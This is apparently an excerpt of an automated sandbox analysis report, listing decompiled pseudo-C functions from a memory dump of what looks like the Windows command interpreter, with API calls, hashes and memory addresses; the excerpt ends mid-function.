                                                    0x011d9bf9
                                                    0x011d9bfb
                                                    0x011f1127
                                                    0x011f1127
                                                    0x011f1132
                                                    0x011f1138
                                                    0x011f1138
                                                    0x011f113b
                                                    0x011f1141
                                                    0x011f1144
                                                    0x011f114a
                                                    0x011f114a
                                                    0x011f1144
                                                    0x011d9b07
                                                    0x011d9b09
                                                    0x00000000
                                                    0x011d9c01
                                                    0x011d9c07
                                                    0x011d9c0a
                                                    0x011d9c11
                                                    0x011d9c14
                                                    0x00000000
                                                    0x011d9c14
                                                    0x011d9bfb
                                                    0x011d9ae7
                                                    0x011d9aef
                                                    0x011d9af4
                                                    0x011f10d1
                                                    0x011f10d6
                                                    0x011f10db
                                                    0x011f10df
                                                    0x011f10e1
                                                    0x011f10e1
                                                    0x011f10e6
                                                    0x011f10ee
                                                    0x011f10ef
                                                    0x011f10f2
                                                    0x00000000
                                                    0x011f10f8
                                                    0x011f10fa
                                                    0x011f10fb
                                                    0x011f10fe
                                                    0x00000000
                                                    0x00000000
                                                    0x011f1109
                                                    0x011f1110
                                                    0x011f1115
                                                    0x011f1117
                                                    0x00000000
                                                    0x00000000
                                                    0x011f111f
                                                    0x00000000
                                                    0x011f111f
                                                    0x011f10f2
                                                    0x011d9afc
                                                    0x00000000
                                                    0x011d9c25
                                                    0x011d9c25
                                                    0x011d9c28
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9c2e
                                                    0x011d9c30
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9c36
                                                    0x011d9c41
                                                    0x011d9c41
                                                    0x00000000
                                                    0x011d9c41
                                                    0x011d9a8f
                                                    0x011d9a8a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp$iswspace
                                                    • String ID: =,;$FOR/?
                                                    • API String ID: 759518647-2121398454
                                                    • Opcode ID: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                                    • Instruction ID: 62e96f59beb866161447ff4f1d43b5cbffa754f38dadb6dd76477d9074248b0a
                                                    • Opcode Fuzzy Hash: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                                    • Instruction Fuzzy Hash: EF6113313407429BEB3DAB7AF95DB7A37A0EB9061CF54411EE2038A9C1EF71A482C715
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D64DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 28%
                                                    			E011D64DC(void* __eflags, intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E011D9794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E011D6355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E011D9794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E011D64DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E011D4409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					__eflags = E011D6785( &_a8,  &_v12, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E011D60DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}













                                                    0x011d64ea
                                                    0x011d64ef
                                                    0x011d64f2
                                                    0x011d64f8
                                                    0x011eac90
                                                    0x011eac90
                                                    0x011d6589
                                                    0x011d658c
                                                    0x011d6591
                                                    0x011d6592
                                                    0x011d6593
                                                    0x011d659a
                                                    0x011d659a
                                                    0x011d6501
                                                    0x011d65cf
                                                    0x011d65d5
                                                    0x011d65d6
                                                    0x011d65d7
                                                    0x011d65d8
                                                    0x011d65d9
                                                    0x011d65e3
                                                    0x011d65e4
                                                    0x011d65e5
                                                    0x011d65e6
                                                    0x011d65ea
                                                    0x011d665c
                                                    0x00000000
                                                    0x011d665c
                                                    0x011d65ef
                                                    0x011d65f4
                                                    0x011d65f7
                                                    0x011d65fb
                                                    0x011eac9c
                                                    0x011d6601
                                                    0x011d6604
                                                    0x011d6604
                                                    0x00000000
                                                    0x011d65fb
                                                    0x011d6517
                                                    0x011d6624
                                                    0x011d6633
                                                    0x011d6634
                                                    0x011d6635
                                                    0x011d6636
                                                    0x011d6637
                                                    0x011d6641
                                                    0x011d6642
                                                    0x011d6643
                                                    0x011d6644
                                                    0x011d6648
                                                    0x00000000
                                                    0x00000000
                                                    0x011d6652
                                                    0x00000000
                                                    0x011d6652
                                                    0x011d651e
                                                    0x011d6527
                                                    0x011d65ac
                                                    0x011d65ae
                                                    0x00000000
                                                    0x011d65b4
                                                    0x011d65bf
                                                    0x00000000
                                                    0x011d65bf
                                                    0x011d65ae
                                                    0x011d6529
                                                    0x011d6531
                                                    0x011d6533
                                                    0x011d653a
                                                    0x011d6609
                                                    0x011d660d
                                                    0x011d6610
                                                    0x011eaca8
                                                    0x011eacae
                                                    0x011d654c
                                                    0x011d654f
                                                    0x011d6557
                                                    0x011eacb9
                                                    0x011eacbf
                                                    0x011eacc2
                                                    0x00000000
                                                    0x00000000
                                                    0x011eacc8
                                                    0x00000000
                                                    0x011eacc8
                                                    0x011d655d
                                                    0x011d656d
                                                    0x011eacd4
                                                    0x011eacd4
                                                    0x00000000
                                                    0x011d656d
                                                    0x011d6616
                                                    0x011d6619
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d661f
                                                    0x011d6540
                                                    0x011d6546
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                    • String ID: +-~!
                                                    • API String ID: 2191331888-2604099254
                                                    • Opcode ID: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                                    • Instruction ID: 60309befc6834d5d1945c4748cbbe6b9b343a600474319de1283a0dbaf62c571
                                                    • Opcode Fuzzy Hash: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                                    • Instruction Fuzzy Hash: CC51B071800609EFCF1DDF68E8489AB3BA4EF15364F51811AFC169B184EB74DA94CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E011F213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E011F292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E011F2913("wil");
				}
				return _t16;
			}











                                                    0x011f213f
                                                    0x011f2140
                                                    0x011f2146
                                                    0x011f214a
                                                    0x011f214c
                                                    0x011f2155
                                                    0x011f2170
                                                    0x011f2183
                                                    0x011f2188
                                                    0x011f21ca
                                                    0x011f21d9
                                                    0x011f21e8
                                                    0x011f21fd
                                                    0x00000000
                                                    0x011f220c
                                                    0x011f220e
                                                    0x011f2217
                                                    0x011f2225
                                                    0x00000000
                                                    0x011f2227
                                                    0x00000000
                                                    0x011f2227
                                                    0x011f2219
                                                    0x00000000
                                                    0x011f2219
                                                    0x011f2217
                                                    0x011f21ea
                                                    0x00000000
                                                    0x011f21ea
                                                    0x011f21db
                                                    0x00000000
                                                    0x011f21db
                                                    0x011f218a
                                                    0x011f2199
                                                    0x011f21a2
                                                    0x011f21b1
                                                    0x00000000
                                                    0x011f222e
                                                    0x011f222e
                                                    0x011f2231
                                                    0x011f2233
                                                    0x011f2233
                                                    0x011f219b
                                                    0x00000000
                                                    0x011f219b
                                                    0x011f2199
                                                    0x011f2179
                                                    0x011f223c
                                                    0x011f224a
                                                    0x011f224f
                                                    0x011f224f
                                                    0x011f2157
                                                    0x011f215c
                                                    0x011f2164
                                                    0x011f2164
                                                    0x011f2257

                                                    APIs
                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,011F2CF5), ref: 011F214C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ObjectSingleWait
                                                    • String ID: wil
                                                    • API String ID: 24740636-1589926490
                                                    • Opcode ID: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                                    • Instruction ID: 449603242a98b89dcc6024e88fb28d9ddfc6f3ae99c9e356955644bf3ea0ab5c
                                                    • Opcode Fuzzy Hash: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                                    • Instruction Fuzzy Hash: 14319538705215ABFB298A69AC88BBB3669EF81354F20413DFB01D7285D774CD428757
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F7C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E011F7C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
				if(_t29 != 0) {
					L5:
					E011E6B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E011DBED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E011DB6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E011E0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E011E6FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}





















                                                    0x011f7c83
                                                    0x011f7c83
                                                    0x011f7c8b
                                                    0x011f7c92
                                                    0x011f7c96
                                                    0x011f7c9d
                                                    0x011f7ca5
                                                    0x011f7cb9
                                                    0x011f7cbf
                                                    0x011f7cc4
                                                    0x011f7d3e
                                                    0x011f7d48
                                                    0x011f7d4d
                                                    0x011f7d59
                                                    0x011f7d5d
                                                    0x011f7d5d
                                                    0x011f7d65
                                                    0x011f7d6b
                                                    0x011f7cc6
                                                    0x011f7ccf
                                                    0x011f7ce0
                                                    0x011f7cef
                                                    0x011f7cf9
                                                    0x011f7d09
                                                    0x011f7d0c
                                                    0x011f7d11
                                                    0x011f7d13
                                                    0x011f7d13
                                                    0x011f7d18
                                                    0x011f7d31
                                                    0x011f7d39
                                                    0x00000000
                                                    0x011f7d3b
                                                    0x011f7d3b
                                                    0x011f7d3b
                                                    0x011f7d39
                                                    0x011f7d7c

                                                    APIs
                                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 011F7CB9
                                                    • _ultoa.MSVCRT ref: 011F7CCF
                                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011F7CD8
                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,011FA21D,000000FF,?,00000020), ref: 011F7CF9
                                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 011F7D31
                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 011F7D65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                    • String ID: (#$Application$System
                                                    • API String ID: 3377411628-593978566
                                                    • Opcode ID: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                                    • Instruction ID: 6dcdd1b9fc6f390178417ddb2751552c779f80dbc392e63d76c9a12e2a66fd9c
                                                    • Opcode Fuzzy Hash: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                                    • Instruction Fuzzy Hash: 1D318D71A00208ABDF25DFA5DC08DEE7BB9FB99714F60422DE911E7180EB309941CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D8885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E011D8885(WCHAR* __ecx) {
				signed int _v8;
				short _v12;
				short _v14;
				short _v16;
				WCHAR* _v20;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t15;
				signed int _t17;
				void* _t22;
				void* _t26;
				WCHAR* _t27;
				long _t28;
				signed int _t29;

				_t8 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t8 ^ _t29;
				_t27 = __ecx;
				_t28 = 0;
				if(GetFullPathNameW(__ecx, 4,  &_v16,  &_v20) == 3) {
					if(_v14 != 0x3a || _v12 != 0x5c) {
						goto L1;
					} else {
						_t15 = 0;
						L3:
						return E011E6FD0(_t15, _t22, _v8 ^ _t29, _t26, _t27, _t28);
					}
				}
				L1:
				if(RemoveDirectoryW(_t27) == 0) {
					_t28 = GetLastError();
					if(_t28 == 5) {
						_t17 = GetFileAttributesW(_t27);
						if(_t17 != 0xffffffff && (_t17 & 0x00000001) != 0 && SetFileAttributesW(_t27, _t17 & 0xfffffffe) != 0) {
							if(RemoveDirectoryW(_t27) == 0) {
								_t28 = GetLastError();
							} else {
								_t28 = 0;
							}
						}
					}
				}
				_t15 = _t28;
				goto L3;
			}


















                                                    0x011d888d
                                                    0x011d8894
                                                    0x011d889c
                                                    0x011d88a2
                                                    0x011d88b1
                                                    0x011f0638
                                                    0x00000000
                                                    0x011f0649
                                                    0x011f0649
                                                    0x011d88c8
                                                    0x011d88d7
                                                    0x011d88d7
                                                    0x011f0638
                                                    0x011d88b7
                                                    0x011d88c0
                                                    0x011f0656
                                                    0x011f065b
                                                    0x011f0662
                                                    0x011f066b
                                                    0x011f0695
                                                    0x011f06a4
                                                    0x011f0697
                                                    0x011f0697
                                                    0x011f0697
                                                    0x011f0695
                                                    0x011f066b
                                                    0x011f065b
                                                    0x011d88c6
                                                    0x00000000

                                                    APIs
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88A8
                                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88B8
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0650
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0662
                                                    • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F067E
                                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F068D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                    • String ID: :$\
                                                    • API String ID: 3961617410-1166558509
                                                    • Opcode ID: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                                    • Instruction ID: 4d899fcd761e5aa527f7c1f72e3e70dc2bcc79a9c61047da9cbfac441b95da2d
                                                    • Opcode Fuzzy Hash: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                                    • Instruction Fuzzy Hash: C011A331E00114AB9B39EB68B85D57E7BB9EB95764B15022CF917E2148EF708941C2A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E2DD2, Relevance: 15.4, APIs: 10, Instructions: 400COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E011E2DD2(signed char* __ecx, signed int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				int _v1100;
				void _v1620;
				int _v1628;
				char _v1632;
				int _v1636;
				void _v2156;
				signed int _v2160;
				signed int _v2164;
				signed int _v2168;
				int _v2172;
				signed int _v2176;
				intOrPtr* _v2180;
				signed char* _v2184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t132;
				signed int _t149;
				void* _t169;
				signed int _t171;
				signed int _t181;
				signed int _t182;
				void* _t184;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t195;
				signed int _t201;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				intOrPtr _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				void* _t243;
				signed int _t245;
				signed int _t248;
				signed int _t265;
				void* _t271;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t284;
				signed char* _t285;
				intOrPtr* _t286;
				signed int _t289;

				_t277 = __edx;
				_t132 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t132 ^ _t289;
				_t287 = 0x104;
				_v2164 = 1;
				_t222 = 0;
				_v24 = 1;
				_v2172 = 0;
				_t285 = __ecx;
				_v28 = 0;
				_v2184 = __ecx;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1636 = 0;
				_v1632 = 1;
				_v1628 = 0x104;
				memset( &_v2156, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v2156, ((0 | _v1632 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L10:
					_t149 = 1;
					goto L11;
				} else {
					_t169 = E011E0C70( &_v1620, ((0 | _v1096 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
					_t302 = _t169;
					if(_t169 < 0 || E011E4E94( &_v2176, _t277, _t302) == 1) {
						goto L10;
					} else {
						_t287 = _v2176;
						_t171 =  *_t285;
						if( *_t287 == 0) {
							_t171 = _t171 & 0xfffffff7;
							 *_t285 = _t171;
						}
						if((_t171 & 0x00000008) != 0) {
							 *((intOrPtr*)(_t287 + 0x24)) =  *((intOrPtr*)(_t287 + 0x1c)) - 1;
							_t171 =  *_t285;
						}
						if((_t171 & 0x00000200) != 0) {
							 *_t285 = _t171 | 0x00000004;
						}
						 *0x1213cf0 = _t222;
						_t277 = 1;
						if(E011E4800(_t285, 1, 1,  &_v2160) != 1) {
							_v2168 = _t222;
							E011E0D89(1, 0x11d24ac);
							E011E0D89(1, 0x11d24ac);
							_t222 = _v2160;
							while(1) {
								__eflags = _t222;
								if(_t222 == 0) {
									break;
								}
								E011E0D89(_t277,  *(_t222 + 4));
								__eflags =  *((char*)(_t222 + 0x10));
								_t181 =  *_t285;
								if( *((char*)(_t222 + 0x10)) != 0) {
									_t181 = _t181 | 0x00000100;
									 *_t285 = _t181;
									__eflags = _t285[0x5c];
									if(_t285[0x5c] == 0) {
										L18:
										__eflags = _t181 & 0x00000040;
										if((_t181 & 0x00000040) == 0) {
											_t182 = _v28;
											__eflags = _t182;
											if(_t182 == 0) {
												_t182 =  &_v548;
											}
											E011E0D89(_t277, _t182);
											_t278 =  *(_t222 + 4);
											_t243 = _t278 + 2;
											do {
												_t184 =  *_t278;
												_t278 = _t278 + 2;
												__eflags = _t184 - _v2172;
											} while (_t184 != _v2172);
											_t185 = _v28;
											_t280 = _t278 - _t243 >> 1;
											__eflags = _t185;
											if(_t185 == 0) {
												_t185 =  &_v548;
											}
											_t277 = _t280 + 1;
											E011E4C89( *(_t222 + 4), _t280 + 1, _t185, _v20);
											_t245 = _v1636;
											__eflags = _t245;
											if(_t245 == 0) {
												_t245 =  &_v2156;
											}
											_t187 = _v28;
											__eflags = _t187;
											if(_t187 == 0) {
												_t187 =  &_v548;
											}
											__imp___wcsicmp(_t187, _t245);
											__eflags = _t187;
											if(_t187 == 0) {
												goto L19;
											} else {
												__eflags = _v2168;
												if(_v2168 == 0) {
													L48:
													_t277 =  *(_t222 + 4);
													_t219 = E011FA834(_t287,  *(_t222 + 4));
													__eflags = _t219;
													if(_t219 != 0) {
														goto L10;
													}
													goto L19;
												}
												_t220 = E011DB610(_t222, _t287, _t285);
												__eflags = _t220;
												if(_t220 != 0) {
													goto L10;
												}
												goto L48;
											}
										}
										L19:
										_t248 =  *_t285;
										_t285[0x64] = 0;
										_t285[0x60] = 0;
										_t285[0x68] = 0;
										_t191 = (_t248 & 0x00000010 | 0x00000020) >> 4;
										_t285[0x6c] = 0;
										__eflags = _t248 & 0x00020400;
										if((_t248 & 0x00020400) != 0) {
											_t191 = _t191 | 0x00000004;
										}
										asm("sbb ecx, ecx");
										_t277 = _t287;
										_t253 = _t222;
										_t192 = E011E5266(_t222, _t287, _t285[4], _t285[8], _t191, _t285, 0, E011E65F0,  !( ~(_t248 & 0x00004004)) & E011E6550, E011E64F0);
										_v2164 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											L70:
											__eflags =  *0x11fd544;
											if( *0x11fd544 != 0) {
												goto L23;
											}
											__eflags = _t192 - 5;
											if(_t192 != 5) {
												__eflags = _t285[0x60] + _t285[0x64];
												if(_t285[0x60] + _t285[0x64] != 0) {
													goto L23;
												}
												E011DB6CB(_t287);
												__eflags = 0;
												_push(0);
												_push(0x40002711);
												E011DC5A2(_t287);
												_v2164 = 1;
												L75:
												goto L23;
											}
											_push(0);
											_push(5);
											E011DC5A2(_t253);
											goto L75;
										} else {
											__eflags = _t285[0x60] + _t285[0x64];
											if(_t285[0x60] + _t285[0x64] == 0) {
												_t192 = _v2164;
												goto L70;
											}
											__eflags =  *_t285 & 0x00000040;
											if(( *_t285 & 0x00000040) == 0) {
												E011E0D89(_t277, 0x11d24ac);
												_t212 =  *_t222;
												__eflags = _t212;
												if(_t212 == 0) {
													L57:
													_t265 = _v28;
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 =  &_v548;
													}
													_t213 = _v564;
													__eflags = _t213;
													if(_t213 == 0) {
														_t213 =  &_v1084;
													}
													__imp___wcsicmp(_t213, _t265);
													__eflags = _t213;
													if(_t213 == 0) {
														goto L23;
													} else {
														__eflags =  *_t285 & 0x00000010;
														if(( *_t285 & 0x00000010) == 0) {
															L65:
															_t277 = _v1100;
															__eflags = _v1100;
															if(__eflags == 0) {
																_t277 =  &_v1620;
															}
															_t149 = E011FA0D2(_t287, _t277, __eflags,  *_t285, _t285[0x64]);
															__eflags = _t149;
															if(_t149 != 0) {
																L11:
																_v2164 = _t149;
																L12:
																__imp__??_V@YAXPAX@Z(_v1100);
																__imp__??_V@YAXPAX@Z(_v564);
																__imp__??_V@YAXPAX@Z(_v1636);
																__imp__??_V@YAXPAX@Z();
																return E011E6FD0(_v2164, _t222, _v8 ^ _t289, _t277, _t285, _t287, _v28);
															} else {
																goto L23;
															}
														}
														_t149 = E011DB610(_t222, _t287, _t285);
														__eflags = _t149;
														if(__eflags != 0) {
															goto L11;
														}
														_t277 = _t285[0x60];
														_t149 = E011FA7F6(_t222, _t287, _t285[0x60], __eflags,  &(_t285[0x68]),  *_t285);
														__eflags = _t149;
														if(_t149 != 0) {
															goto L11;
														}
														goto L65;
													}
												}
												_t215 =  *((intOrPtr*)(_t212 + 4));
												_t282 = _t215;
												_v2160 = _t215;
												_t271 = _t282 + 2;
												do {
													_t216 =  *_t282;
													_t282 = _t282 + 2;
													__eflags = _t216 - _v2172;
												} while (_t216 != _v2172);
												_t217 = _v564;
												_t284 = _t282 - _t271 >> 1;
												__eflags = _t217;
												if(_t217 == 0) {
													_t217 =  &_v1084;
												}
												_t277 = _t284 + 1;
												__eflags = _t284 + 1;
												E011E4C89(_v2160, _t284 + 1, _t217, _v556);
												goto L57;
											}
											L23:
											E011E0040( *(_t222 + 4));
											_t194 =  *((intOrPtr*)(_t222 + 0xc));
											_v2180 = _t194;
											_v2160 = 1;
											__eflags =  *((intOrPtr*)(_t222 + 8)) - 1;
